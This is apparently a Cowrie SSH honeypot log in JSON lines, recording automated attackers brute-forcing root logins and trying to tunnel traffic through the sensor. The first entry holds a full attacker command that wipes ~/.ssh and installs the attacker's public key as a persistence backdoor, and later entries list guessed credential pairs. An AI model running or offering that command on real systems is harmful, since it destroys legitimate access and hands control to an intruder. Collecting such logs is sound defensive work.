{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:50:34.672749Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:50:34.870552Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:34.871760Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.session.connect","src_ip":"103.153.191.173","src_port":37622,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7479c324b3e","protocol":"ssh","message":"New connection: 103.153.191.173:37622 (1.2.3.4:22) [session: d7479c324b3e]","sensor":"my-vps","timestamp":"2025-08-26T15:50:35.085108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:50:35.085959Z","src_ip":"103.153.191.173","session":"d7479c324b3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:50:35.292354Z","src_ip":"103.153.191.173","session":"d7479c324b3e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:50:36.157310Z","src_ip":"103.153.191.173","session":"d7479c324b3e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:37.366463Z","src_ip":"103.153.191.173","session":"d7479c324b3e"}
{"eventid":"cowrie.session.connect","src_ip":"103.153.191.173","src_port":37634,"dst_ip":"1.2.3.4","dst_port":22,"session":"26a29f25e433","protocol":"ssh","message":"New connection: 103.153.191.173:37634 (1.2.3.4:22) [session: 26a29f25e433]","sensor":"my-vps","timestamp":"2025-08-26T15:50:37.552676Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:50:37.553849Z","src_ip":"103.153.191.173","session":"26a29f25e433"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:50:37.749140Z","src_ip":"103.153.191.173","session":"26a29f25e433"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:50:38.528686Z","src_ip":"103.153.191.173","session":"26a29f25e433"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:38.725504Z","src_ip":"103.153.191.173","session":"26a29f25e433"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:38.726464Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50544,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a748506b2aa","protocol":"ssh","message":"New connection: 217.72.205.35:50544 (1.2.3.4:22) [session: 1a748506b2aa]","sensor":"my-vps","timestamp":"2025-08-26T15:50:47.524825Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:47.526004Z","src_ip":"217.72.205.35","session":"1a748506b2aa"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":41688,"dst_ip":"1.2.3.4","dst_port":22,"session":"c061a96ca3df","protocol":"ssh","message":"New connection: 194.0.234.21:41688 (1.2.3.4:22) [session: c061a96ca3df]","sensor":"my-vps","timestamp":"2025-08-26T15:50:49.577639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T15:50:49.585144Z","src_ip":"194.0.234.21","session":"c061a96ca3df"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T15:50:49.599258Z","src_ip":"194.0.234.21","session":"c061a96ca3df"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:50:49.675676Z","src_ip":"194.0.234.21","session":"c061a96ca3df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.2.65.48","dst_port":443,"src_ip":"194.0.234.21","src_port":33038,"message":"direct-tcp connection request to 23.2.65.48:443 from 127.0.0.1:33038","sensor":"my-vps","timestamp":"2025-08-26T15:50:51.110220Z","session":"c061a96ca3df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.2.65.48","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03D\\xe8\\xecOowS\\x94\\x19)\\xd3\\\\`\\x8d\\x9d\\xcf\\xb3\\xb0\\x9f\\x91\\xa0\\x00\\xc5\\t\\xfe\\xc8\\x02\"\\xae\\x1b\\xb8\\x9a ty\\x7f\\xfd,\\x84\\xb1\\x8f\\x06\\xae5}\\xa6\\t\\xb4\\xa4\\xf9\\x8c\\x8d\\x7f\\xae\\xd3{\\xf3\\x93rH\\x86\\xf00\\xfe+\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x83\\xff;B\\xa4\\x84K\\x94\\xe7R\\x16\\xef!\\xa6xxZ\\x96\\xdc\\xe5S\\xdf\\xc9\\xbam\\n\\xa9\\x05\\xae\\x82\\xff)\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":0,"message":"discarded direct-tcp forward request 0 to 23.2.65.48:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03D\\xe8\\xecOowS\\x94\\x19)\\xd3\\\\`\\x8d\\x9d\\xcf\\xb3\\xb0\\x9f\\x91\\xa0\\x00\\xc5\\t\\xfe\\xc8\\x02\"\\xae\\x1b\\xb8\\x9a ty\\x7f\\xfd,\\x84\\xb1\\x8f\\x06\\xae5}\\xa6\\t\\xb4\\xa4\\xf9\\x8c\\x8d\\x7f\\xae\\xd3{\\xf3\\x93rH\\x86\\xf00\\xfe+\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x83\\xff;B\\xa4\\x84K\\x94\\xe7R\\x16\\xef!\\xa6xxZ\\x96\\xdc\\xe5S\\xdf\\xc9\\xbam\\n\\xa9\\x05\\xae\\x82\\xff)\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T15:50:51.129209Z","src_ip":"194.0.234.21","session":"c061a96ca3df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.203.132","dst_port":443,"src_ip":"194.0.234.21","src_port":33072,"message":"direct-tcp connection request to 142.250.203.132:443 from 127.0.0.1:33072","sensor":"my-vps","timestamp":"2025-08-26T15:50:51.145697Z","session":"c061a96ca3df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.203.132","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x99\\xbbFcHU\\x1c\\x84\\xcd\\xb5(\\xc5\\xa6+\\x12\\xd9\\x13\\xfe\\xb1\\x83y?\\xe9r\\x19\\x80\\xeb\\x99\\x9bt\\xf4\\xf9 \\x11Z\\xc0\\xe9\\x86+/u\\xb8\\x1d\\x803ai\\x1fu\\xaa\\xd0\\xe91\\xc7\\xa1M\\xfb8d^\\x158.A\\xe9\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xf5\\xcbS5\\x83\\x8fDCI\\xa8B\\xc6\\xa8\\xcff\\xf6\\xb8\\x955m\\xc2\"\\xa0\\xd0\\xb4\\xf2\\xb6C\\xca\\xfa^u\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 142.250.203.132:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x99\\xbbFcHU\\x1c\\x84\\xcd\\xb5(\\xc5\\xa6+\\x12\\xd9\\x13\\xfe\\xb1\\x83y?\\xe9r\\x19\\x80\\xeb\\x99\\x9bt\\xf4\\xf9 \\x11Z\\xc0\\xe9\\x86+/u\\xb8\\x1d\\x803ai\\x1fu\\xaa\\xd0\\xe91\\xc7\\xa1M\\xfb8d^\\x158.A\\xe9\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xf5\\xcbS5\\x83\\x8fDCI\\xa8B\\xc6\\xa8\\xcff\\xf6\\xb8\\x955m\\xc2\"\\xa0\\xd0\\xb4\\xf2\\xb6C\\xca\\xfa^u\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T15:50:51.165964Z","src_ip":"194.0.234.21","session":"c061a96ca3df"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:51.184922Z","src_ip":"194.0.234.21","session":"c061a96ca3df"}
{"eventid":"cowrie.session.closed","duration":30.440855741500854,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:55.382351Z","src_ip":"212.227.125.160","session":"b4842cfe15bc"}
